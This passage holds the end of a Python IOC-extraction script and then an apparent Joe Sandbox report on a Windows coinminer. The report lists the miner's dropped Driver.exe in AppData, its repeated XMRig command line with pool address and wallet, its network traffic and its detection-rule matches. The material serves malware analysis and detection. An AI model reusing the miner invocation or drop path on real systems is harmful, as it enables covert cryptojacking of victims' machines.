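                "wallet_case_lost": bool(wallet) and wallet == wallet.lower(),
            })
    return iocs


def wallet_matches_cmdline(pcap_wallet, cmdline_wallet):
    return len(pcap_wallet) == 95 and pcap_wallet.lower() == cmdline_wallet.lower()


if __name__ == "__main__":
    for ioc in extract_iocs(SEGMENTS):
        print(ioc, "cmdline match:", wallet_matches_cmdline(ioc["wallet"], CMDLINE_WALLET))
```

Feeding this the raw stream from the pcap rather than the report's rendering avoids the case problem altogether; the `wallet_case_lost` flag exists for the situation on this page, where only the rendered payload is at hand.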
Source: kWYLtJ0Cn1.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: kWYLtJ0Cn1.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\9h4bqyhzw0\output.pdb | source: kWYLtJ0Cn1.exe
Source: Binary string: C:\9h4bqyhzw0\output.pdb. | source: kWYLtJ0Cn1.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 01213286h | 1_2_01212E1B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 012113A9h | 1_2_01211248
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h | 1_2_0121059C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h | 1_2_01210CE0
Source: global traffic | TCP traffic: 192.168.2.4:49730 -> 141.94.96.195:3333
Source: global traffic | TCP traffic: 192.168.2.4:49738 -> 141.94.96.71:3333
Source: global traffic | TCP traffic: 192.168.2.4:49740 -> 141.94.96.144:3333
Source: Joe Sandbox View | IP Address: 141.94.96.195
Source: Joe Sandbox View | IP Address: 141.94.96.71
Source: Joe Sandbox View | IP Address: 141.94.96.144
Source: Joe Sandbox View | ASN Name: DFNVereinzurFoerderungeinesDeutschenForschungsnetzese (reported for each of the three IP addresses above)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: pool.supportxmr.com
Source: kWYLtJ0Cn1.exe, 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000001.00000002.4118537501.000000000067C000.00000040.00000400.00020000.00000000.sdmp, Driver.exe.1.dr | Strings found in binary or memory (code-signing certificate chain URLs, i.e. CA-issuer, CRL and OCSP endpoints, not C2; trailing bytes as extracted):
  http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
  http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
  http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
  http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
  http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
  http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
  http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
  http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
  http://crl3.digicert.com/sha2-assured-ts.crl02
  http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
  http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
  http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
  http://crl4.digicert.com/sha2-assured-ts.crl0
  http://ocsp.comodoca.com0
  http://ocsp.digicert.com0A
  http://ocsp.digicert.com0C
  http://ocsp.digicert.com0O
  http://www.digicert.com/ssl-cps-repository.htm0
  https://www.digicert.com/CPS0
Source: Driver.exe, 00000002.00000002.1744696812.0000000140001000.00000040.00000001.01000000.00000006.sdmp, Driver.exe, 00000014.00000002.4119483358.0000000140001000.00000040.00000001.01000000.00000006.sdmp | Strings found in binary or memory:
  https://xmrig.com/docs/algorithms
  https://xmrig.com/wizard
  https://xmrig.com/wizard%s

                    System Summary

                    Source: 0.2.kWYLtJ0Cn1.exe.ffcbc0.1.unpack, type: UNPACKEDPE | Matched rule: Detects coinmining malware Author: ditekSHen
                    Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects coinmining malware Author: ditekSHen
                    Source: 0.2.kWYLtJ0Cn1.exe.f60000.0.unpack, type: UNPACKEDPE | Matched rule: Detects coinmining malware Author: ditekSHen
                    Source: 00000014.00000002.4119483358.0000000140001000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                    Source: 00000002.00000002.1744696812.0000000140001000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                    Source: Process Memory Space: Driver.exe PID: 7476, type: MEMORYSTR | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                    Source: Process Memory Space: Driver.exe PID: 4336, type: MEMORYSTR | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Process Stats: CPU usage > 49%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exe | Code function: 0_2_00FD86EF
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exe | Code function: 0_2_00FD25F2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 1_2_01217D68
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 1_2_012132F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 1_2_01216F38
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 1_2_012169E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 1_2_012132E7
                    Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe 8D6ABBA9B216172CFC64B8802DB0D20A1C634C96E1049F451EDDBA2363966BF0
                    Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 444 -p 7476 -ip 7476
                    Source: kWYLtJ0Cn1.exe, 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilename0 vs kWYLtJ0Cn1.exe
                    Source: kWYLtJ0Cn1.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.kWYLtJ0Cn1.exe.ffcbc0.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_CoinMiner04 author = ditekSHen, description = Detects coinmining malware
                    Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_CoinMiner04 author = ditekSHen, description = Detects coinmining malware
                    Source: 0.2.kWYLtJ0Cn1.exe.f60000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_CoinMiner04 author = ditekSHen, description = Detects coinmining malware
                    Source: 00000014.00000002.4119483358.0000000140001000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                    Source: 00000002.00000002.1744696812.0000000140001000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                    Source: Process Memory Space: Driver.exe PID: 7476, type: MEMORYSTR | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                    Source: Process Memory Space: Driver.exe PID: 4336, type: MEMORYSTR | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                    Source: classification engine | Classification label: mal100.troj.expl.evad.mine.winEXE@29/2@1/3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File created: C:\Users\user\AppData\Roaming\Sysfiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Mutant created: NULL
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7484:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7656:120:WilError_03
                    Source: C:\Windows\System32\WerFault.exe | Mutant created: \BaseNamedObjects\Local\SM0:7572:120:WilError_03
                    Source: C:\Windows\System32\WerFault.exe | Mutant created: \BaseNamedObjects\Local\SM0:1368:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1244:120:WilError_03
                    Source: C:\Windows\System32\WerFault.exe | Mutant created: \BaseNamedObjects\Local\SM0:4520:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6564:120:WilError_03
                    Source: C:\Windows\System32\svchost.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\2f0d5264-2d07-4e9b-ac40-d81c978b4e1c
                    Source: kWYLtJ0Cn1.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: kWYLtJ0Cn1.exe | ReversingLabs: Detection: 50%
                    Source: Driver.exe | String found in binary or memory: r_id; jit_vmcnt=(vmcnt<s_waitcnt_value)?vmcnt:-1; if(vmcnt<s_waitcnt_value) s_waitcnt_value=vmcnt; done=true; } p=jit_emit_instruction(p,last_branch_target,jit_inst,jit_prefetch_vgpr_index,jit_vmcnt,batch_size); if(p-start_p>size_limit) { *(p++)=S_SETPC_B64_S1
                    Source: unknown | Process created: C:\Users\user\Desktop\kWYLtJ0Cn1.exe "C:\Users\user\Desktop\kWYLtJ0Cn1.exe"
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                    Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 444 -p 7476 -ip 7476
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7476 -s 764
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                    Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 476 -p 7632 -ip 7632
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7632 -s 864
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 544 -p 6272 -ip 6272
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6272 -s 864
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2
                    Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 444 -p 7476 -ip 7476
                    Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7476 -s 764
                    Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 476 -p 7632 -ip 7632
                    Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7632 -s 864
                    Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 544 -p 6272 -ip 6272
                    Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6272 -s 864
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: apphelp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: aclayers.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mpr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc_os.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wbemcomn.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: propsys.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: amsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: userenv.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: profapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: edputil.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: urlmon.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: iertutil.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: srvcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: netutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: windows.staterepositoryps.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wintypes.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: appresolver.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: bcp47langs.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: slc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sppc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: onecorecommonproxystub.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Section loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Section loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Section loaded: powrprof.dll
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Section loaded: umpdc.dll
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Section loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Section loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Section loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Section loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Section loaded: napinsp.dll
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Section loaded: pnrpnsp.dll
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Section loaded: wshbth.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: wersvc.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: windowsperformancerecordercontrol.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: weretw.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: wer.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: faultrep.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: dbghelp.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: dbgcore.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: wer.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Section loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Section loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Section loaded: powrprof.dll
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Section loaded: umpdc.dll
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Section loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Section loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Section loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Section loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Section loaded: napinsp.dll
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Section loaded: pnrpnsp.dll
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Section loaded: wshbth.dll
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Section loaded: nlaapi.dll
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Section loaded: winrnr.dll
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Section loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe | Section loaded: fwpuclnt.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: wersvc.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: windowsperformancerecordercontrol.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: weretw.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: wer.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
